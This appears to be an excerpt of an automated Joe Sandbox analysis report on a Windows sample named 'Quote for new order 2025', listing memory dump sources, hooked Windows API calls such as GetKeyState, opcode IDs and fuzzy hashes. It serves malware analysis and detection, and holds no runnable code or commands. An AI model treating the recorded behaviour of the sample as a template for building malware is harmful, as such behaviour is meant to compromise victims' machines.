                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_92d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                                        • Instruction ID: f93364e2bd0e1da38e241a9fa3fbe3b89b732e5b86597de19faa98c0d9466a06
                                                                                                                                                        • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                                        • Instruction Fuzzy Hash: EA11C475505280CFDB12CF14E5C4B16FF71FB94328F24C6AAE8494B65AC37AD84ACB92
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528504362.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_92d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                        • Instruction ID: 64786dc3d6172fa57387e94bab897888fac8c8f358f860c7735b50c7d2bc3d82
                                                                                                                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                        • Instruction Fuzzy Hash: A9118B75504280DFDB16CF14D5C4B15BBA1FB84314F24C6AAD8494B69AC33AD84ACBA1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528504362.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_92d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: f4fd1685533d0d384cdf4d5ee6433410c1088aed2c2c41d4a7b17b624f589a6c
                                                                                                                                                        • Instruction ID: 8101471dbc4408f8041a25e67ebe1cccc07697c515e1afe77a7c73a4f753257d
                                                                                                                                                        • Opcode Fuzzy Hash: f4fd1685533d0d384cdf4d5ee6433410c1088aed2c2c41d4a7b17b624f589a6c
                                                                                                                                                        • Instruction Fuzzy Hash: 27110272505280CFDB15CF14E5C471AFFB5FB94318F24C6AAD8494B65AC33AD80ACB92
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528369788.000000000091D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0091D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_91d000_Quote for new order 2025.jbxd
Memory Dump Source
• Source File: 00000005.00000002.3528369788.000000000091D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0091D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_91d000_Quote for new order 2025.jbxd
Memory Dump Source
• Source File: 00000005.00000002.3528369788.000000000091D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0091D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_91d000_Quote for new order 2025.jbxd
Memory Dump Source
• Source File: 00000005.00000002.3528369788.000000000091D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0091D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_91d000_Quote for new order 2025.jbxd
APIs
• GetKeyState.USER32(00000001), ref: 06F5E90D
• GetKeyState.USER32(00000002), ref: 06F5E952
• GetKeyState.USER32(00000004), ref: 06F5E997
• GetKeyState.USER32(00000005), ref: 06F5E9DC
• GetKeyState.USER32(00000006), ref: 06F5EA21
Memory Dump Source
• Source File: 00000005.00000002.3540242653.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6f50000_Quote for new order 2025.jbxd
Similarity
• API ID: State
• String ID:
• API String ID: 1649606143-0

Execution Graph

Execution Coverage: 9.9%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 223
Total number of Limit Nodes: 34

Control-flow Graph for the function at 7590458
APIs
• GetSysColorBrush.USER32(00000000), ref: 075908E8
Memory Dump Source
• Source File: 0000000B.00000002.3540920710.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7590000_Quote for new order 2025.jbxd
Similarity
• API ID: BrushColor
• String ID:
• API String ID: 464657469-0

Control-flow Graph for the function at 759f7f1
Memory Dump Source
• Source File: 0000000B.00000002.3540920710.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7590000_Quote for new order 2025.jbxd

Control-flow Graph (rendered image; legend: Executed / Not Executed): basic blocks 2a57530-2a5770d, with API nodes GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId and a call to 2a5770f.
APIs
• GetCurrentProcess.KERNEL32 ref: 02A575BE
• GetCurrentThread.KERNEL32 ref: 02A575FB
• GetCurrentProcess.KERNEL32 ref: 02A57638
• GetCurrentThreadId.KERNEL32 ref: 02A57691
Memory Dump Source
• Source File: 0000000B.00000002.3529658313.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2a50000_Quote for new order 2025.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 290f696b3ed3c8691f04b79871e8d1bb5ef6c56ed47a50dc12eb91587c5c6a21
• Instruction ID: 9a981ab5fee6e232307404b9706a5f8600a1ed57367181a4510aff2f054e9987
• Opcode Fuzzy Hash: 290f696b3ed3c8691f04b79871e8d1bb5ef6c56ed47a50dc12eb91587c5c6a21
• Instruction Fuzzy Hash: FF5146B0900349CFDB04CFAAD548BEEBBF1EB48318F208459D459AB2A1DB34A944CF65

Control-flow Graph (rendered image; legend: Executed / Not Executed): basic blocks 2a57540-2a5770d, with API nodes GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId and a call to 2a5770f.
APIs
• GetCurrentProcess.KERNEL32 ref: 02A575BE
• GetCurrentThread.KERNEL32 ref: 02A575FB
• GetCurrentProcess.KERNEL32 ref: 02A57638
• GetCurrentThreadId.KERNEL32 ref: 02A57691
Memory Dump Source
• Source File: 0000000B.00000002.3529658313.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2a50000_Quote for new order 2025.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 16deee04861a55257ab8999fc1f0189b438f61c7d496585ff5646ae72c56169d
• Instruction ID: e2c77f2d7a5c828211a5d8b091c721fbf2c40fa6687cad52991359df4ae4e673
• Opcode Fuzzy Hash: 16deee04861a55257ab8999fc1f0189b438f61c7d496585ff5646ae72c56169d
• Instruction Fuzzy Hash: F85136B0900249DFDB14DFAAD548BEEFBF1EB48318F208459E419A7260DB34A984CF65

Control-flow Graph (rendered image; legend: Executed / Not Executed): basic blocks 2a5d4c8-2a5d758, with an API node GetModuleHandleW and calls to 2a5c374, 2a5d761/2a5d770, 2a5c380, 2a5c390, 2a5c148, 2a5c3a0 and 2a5da41/2a5da50.
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 02A5D72E
Memory Dump Source
• Source File: 0000000B.00000002.3529658313.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2a50000_Quote for new order 2025.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 7aea982effceb467a4b57346225a424efdbec9ca2e9f7552a53b8f2fe0507854
• Instruction ID: 73ea5922dcbcda122a5eec9c21bf17793accd8d6339ec705e3b9dd3764dbe676
• Opcode Fuzzy Hash: 7aea982effceb467a4b57346225a424efdbec9ca2e9f7552a53b8f2fe0507854
• Instruction Fuzzy Hash: B0812470A00B158FD724DF69D19075BBBF2FF88314F00896ED88A9BA50DB34E846CB91

Control-flow Graph (rendered image; legend: Executed / Not Executed): basic blocks 2a5fad0-2a5fc40, with an API node CreateWindowExW.
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02A5FBE2
Memory Dump Source
• Source File: 0000000B.00000002.3529658313.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2a50000_Quote for new order 2025.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 34208b47cde3f89c3eec5b0a3d3ff4a50526e7f51b398574d2f9abd9dd96051d
• Instruction ID: d1c98ecd5c9e71c0837bee49c514034e1df67576a9006c12b9e5bf4f813d2dc9
• Opcode Fuzzy Hash: 34208b47cde3f89c3eec5b0a3d3ff4a50526e7f51b398574d2f9abd9dd96051d
• Instruction Fuzzy Hash: 6441C0B1D00359DFDB14CFA9C984ADEBBB5FF48314F24812AE818AB210D7759885CF91
APIs
• DrawTextExW.USER32(?,?,?,?,?,?), ref: 075900D7
Memory Dump Source
• Source File: 0000000B.00000002.3540920710.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7590000_Quote for new order 2025.jbxd
Similarity
• API ID: DrawText
• String ID:
• API String ID: 2175133113-0
• Opcode ID: 6dc4370e63c4ba1fb3e2af811e37b07fc163fe155a6ae34f53ec86f7e8f37a40
• Instruction ID: eb94eac244ad521a88f9c7deff23560444a44a604f2bce945b2e119d1044f71f
• Opcode Fuzzy Hash: 6dc4370e63c4ba1fb3e2af811e37b07fc163fe155a6ae34f53ec86f7e8f37a40
• Instruction Fuzzy Hash: 643104B59053499FDB11CFA9D880ADEBBF4FF48310F58842AE818A7251D335A945CFA4
APIs
• DrawTextExW.USER32(?,?,?,?,?,?), ref: 075900D7
Memory Dump Source
• Source File: 0000000B.00000002.3540920710.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7590000_Quote for new order 2025.jbxd
Similarity
• API ID: DrawText
• String ID:
• API String ID: 2175133113-0
• Opcode ID: c6c63b117113fd619bb7b3c2bcc475531c3e780002055b21f90b79c966a0857b
• Instruction ID: aac49c4d5caa4812bf91bc26b11d15b010b9ee8747a874d04effb15fa474f51b
• Opcode Fuzzy Hash: c6c63b117113fd619bb7b3c2bcc475531c3e780002055b21f90b79c966a0857b
• Instruction Fuzzy Hash: 4C21D2B5D0034A9FDB10CF9AD884ADEFBF5FB48320F54842AE819A7250D775A944CFA4
APIs
• PostMessageW.USER32(?,?,?,?), ref: 0759F3C5
Memory Dump Source
• Source File: 0000000B.00000002.3540920710.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7590000_Quote for new order 2025.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: 2cb0a789c1b8c5cb403839cb748f9d164b76985b6af9b8daad2f24042fbc57e9
• Instruction ID: f4aa37c5ad003fad20d8fc6c44c09d95a8f05b2385687a26e287bfac2198ac89
• Opcode Fuzzy Hash: 2cb0a789c1b8c5cb403839cb748f9d164b76985b6af9b8daad2f24042fbc57e9
• Instruction Fuzzy Hash: 52213D718083899FDB11CF99C8457DEBFF4EF49320F15849AD854A7252D338A948CFA5
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A5780F
Memory Dump Source
• Source File: 0000000B.00000002.3529658313.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2a50000_Quote for new order 2025.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 4a69d73a5598b43302b950c22ec549bd81f27ae983a678e37d82900461b36b6b
• Instruction ID: 8425910253ae4eedca6d2a11947803f7387dab021410d4019dff1d8231def5cd
• Opcode Fuzzy Hash: 4a69d73a5598b43302b950c22ec549bd81f27ae983a678e37d82900461b36b6b
• Instruction Fuzzy Hash: 5321E5B5900258DFDB10CFAAD984AEEFBF5FB48320F14841AE954A3250D379A944CFA5
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A5780F
Memory Dump Source
• Source File: 0000000B.00000002.3529658313.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2a50000_Quote for new order 2025.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 90526d290a32159a8f5685aef2eb5e08a24f7448ef05ac407b97d411cdf0449c
• Instruction ID: b98191ed95522ba6ba68bf3b3f60f4a183ba7964f52cfab66adeb351487c96b2
• Opcode Fuzzy Hash: 90526d290a32159a8f5685aef2eb5e08a24f7448ef05ac407b97d411cdf0449c
• Instruction Fuzzy Hash: 9721E3B59002589FDB10CFAAD984ADEFBF4EB48320F14841AE914A3210D378A944CFA5
                                                                                                                                                        APIs
                                                                                                                                                        • PeekMessageW.USER32(?,?,?,?,?), ref: 0759FD68
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3540920710.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_7590000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePeek
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2222842502-0
                                                                                                                                                        • Opcode ID: cfef675063702f86a91914aad696f596e191053e4ee4478a7442ec020da3105c
                                                                                                                                                        • Instruction ID: 467815edffb9faba38544dcc8a22dc8a909b04269556a6b0aec618e2613e30f7
                                                                                                                                                        • Opcode Fuzzy Hash: cfef675063702f86a91914aad696f596e191053e4ee4478a7442ec020da3105c
                                                                                                                                                        • Instruction Fuzzy Hash: 942133B28003599FDB10CF9AD444ADEBBF8FB08320F00842AE958A7291C378A544CFA5
                                                                                                                                                        APIs
                                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 0759FF8D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3540920710.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_7590000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2492992576-0
                                                                                                                                                        • Opcode ID: b32226b50f3a21a3867fbed6336cb4b590b60beb4e2b2c3cefeb8ee1fbd37354
                                                                                                                                                        • Instruction ID: ba8b7af04b149f4a083c29e95b293506a3083315afca5237c860b5b1545d9095
                                                                                                                                                        • Opcode Fuzzy Hash: b32226b50f3a21a3867fbed6336cb4b590b60beb4e2b2c3cefeb8ee1fbd37354
                                                                                                                                                        • Instruction Fuzzy Hash: 591126B58043499FDB10DF9AD444BDEFBF8FB48320F10842AE858A3240D378A584CFA5
                                                                                                                                                        APIs
                                                                                                                                                        • PeekMessageW.USER32(?,?,?,?,?), ref: 0759FD68
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3540920710.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_7590000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePeek
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2222842502-0
                                                                                                                                                        • Opcode ID: 4d8fd773560d0f2293562dc29f1e3138ae09d99cf0bc898e18b37f2a81e23c56
                                                                                                                                                        • Instruction ID: fa433a4b824daa837cfc3eabcfab3ab48860b1b7daa040afc0af678d4fdbf7cb
                                                                                                                                                        • Opcode Fuzzy Hash: 4d8fd773560d0f2293562dc29f1e3138ae09d99cf0bc898e18b37f2a81e23c56
                                                                                                                                                        • Instruction Fuzzy Hash: 5511F3B5800249DFDB10CF9AD944BDEFBF8FB48320F10842AE958A7251C378A544CFA5
                                                                                                                                                        APIs
                                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 0759FF8D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3540920710.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_7590000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2492992576-0
                                                                                                                                                        • Opcode ID: 89a84dd8990360c71c8efa95d2bce6892bc414b29e94c6f8559800c2e468b6fb
                                                                                                                                                        • Instruction ID: a6730f976aa94fa1a45251c7c023000b882464248e8d36e96247466a5a931ba7
                                                                                                                                                        • Opcode Fuzzy Hash: 89a84dd8990360c71c8efa95d2bce6892bc414b29e94c6f8559800c2e468b6fb
                                                                                                                                                        • Instruction Fuzzy Hash: 0011F3B18042499FDB10CF9AD844BDEFBF8FB48320F10842AE858A3240D378A584CFA5
                                                                                                                                                        APIs
                                                                                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 0759F3C5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3540920710.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_7590000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePost
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 410705778-0
                                                                                                                                                        • Opcode ID: 59d3272365dbe9a3203951de2a60fae9d69a71a19fd16d28458dd12554426ab3
                                                                                                                                                        • Instruction ID: b593e592a663afae693eb3d27df156ce35f9b5337d3843742c35bec7eee2ea9d
                                                                                                                                                        • Opcode Fuzzy Hash: 59d3272365dbe9a3203951de2a60fae9d69a71a19fd16d28458dd12554426ab3
                                                                                                                                                        • Instruction Fuzzy Hash: F711F5B5800349DFDB10CF9AC845BDEFBF8EB48324F10842AE954A7651D379A584CFA5
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3541169261.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_75c0000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatchMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2061451462-0
                                                                                                                                                        • Opcode ID: d14842629ff08fa8cffb9bc571894d1620fe619992de5dc8741975146ed0fc3d
                                                                                                                                                        • Instruction ID: 9475e3374e9593076334ca60b9056498d3bf8efe4636d2a5235342da032edb93
                                                                                                                                                        • Opcode Fuzzy Hash: d14842629ff08fa8cffb9bc571894d1620fe619992de5dc8741975146ed0fc3d
                                                                                                                                                        • Instruction Fuzzy Hash: A51110B1C04248CFDB10CF9AD944BCEFBF4EB48324F10842AD868A7250C378A544CFA5
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3541169261.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_75c0000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatchMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2061451462-0
                                                                                                                                                        • Opcode ID: 9bac76353d5a76978c282c119a2e436a89f28be2e1798019142a55ad3f3ef9ec
                                                                                                                                                        • Instruction ID: 1769a0f84f57d7fd2ee3d478154fafd4eaf5cfd2ebe72c2e7c2fcbaaf3f7eccf
                                                                                                                                                        • Opcode Fuzzy Hash: 9bac76353d5a76978c282c119a2e436a89f28be2e1798019142a55ad3f3ef9ec
                                                                                                                                                        • Instruction Fuzzy Hash: C61125B1C042488FDB10CF9AD544BDEFBF4EB48324F24842AD858A7210D378A544CFA5
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 02A5D72E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3529658313.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_2a50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                        • Opcode ID: 0904ac44ef9027299f369f2277109fb76c3189988ba4fd1b687f7577a4150b9d
                                                                                                                                                        • Instruction ID: 58f8897307d28974267d3fe35d4e3b3ab0cb91924d3fd3c1bd5eace6a4142c99
                                                                                                                                                        • Opcode Fuzzy Hash: 0904ac44ef9027299f369f2277109fb76c3189988ba4fd1b687f7577a4150b9d
                                                                                                                                                        • Instruction Fuzzy Hash: 271110B5C00659CFCB10CF9AC444ADFFBF4EB88324F10842AD828A7210D379A585CFA5
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3541169261.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_75c0000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatchMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2061451462-0
                                                                                                                                                        • Opcode ID: ff55b489a4feac2d9b5d0045cef5cade15d5155548a8ec97c86410da503823ab
                                                                                                                                                        • Instruction ID: 9f6ee7d9425cb53cbc726a4f5b8c556cd6aa200fb11a343b026a8ca2a1a45fde
                                                                                                                                                        • Opcode Fuzzy Hash: ff55b489a4feac2d9b5d0045cef5cade15d5155548a8ec97c86410da503823ab
                                                                                                                                                        • Instruction Fuzzy Hash: 44110DB1C04259CFDB10DF9AD948BCEFBF4EB48324F10842AE868A3250D378A544CFA5
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3541169261.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_75c0000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatchMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2061451462-0
                                                                                                                                                        • Opcode ID: 6fb361f82832642abc541583455fef34f6eff8f155ab0ceefd2ad1d185789559
                                                                                                                                                        • Instruction ID: 57be0734af33f52724bd91dbfcc91a87e1589451c7f92ea9aefbce5d4642701f
                                                                                                                                                        • Opcode Fuzzy Hash: 6fb361f82832642abc541583455fef34f6eff8f155ab0ceefd2ad1d185789559
                                                                                                                                                        • Instruction Fuzzy Hash: 2D11D0B5C04659CFDB10DF9AD544BDEFBF4EB48324F20842AD868A7210D379A544CFA5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3528976256.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_10ad000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
APIs
• GetKeyState.USER32(00000001), ref: 0759E90D
• GetKeyState.USER32(00000002), ref: 0759E952
• GetKeyState.USER32(00000004), ref: 0759E997
• GetKeyState.USER32(00000005), ref: 0759E9DC
• GetKeyState.USER32(00000006), ref: 0759EA21
Memory Dump Source
• Source File: 0000000B.00000002.3540920710.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7590000_Quote for new order 2025.jbxd
Similarity
• API ID: State
• String ID:
• API String ID: 1649606143-0
• Opcode ID: 557223a5e579fa45b16bcfc264cd934ee512ff251a269872cdb941a5331b4279
                                                                                                                                                        • Instruction ID: 7090ad858459bf3b5ac838759d56eb345276c371ac008508bf8335e6b0e3c7ce
                                                                                                                                                        • Opcode Fuzzy Hash: 557223a5e579fa45b16bcfc264cd934ee512ff251a269872cdb941a5331b4279
                                                                                                                                                        • Instruction Fuzzy Hash: B64160B180078A8EEF11DF59C5493EFBFF4BB05309F208429D499A7290C7B9A645CF92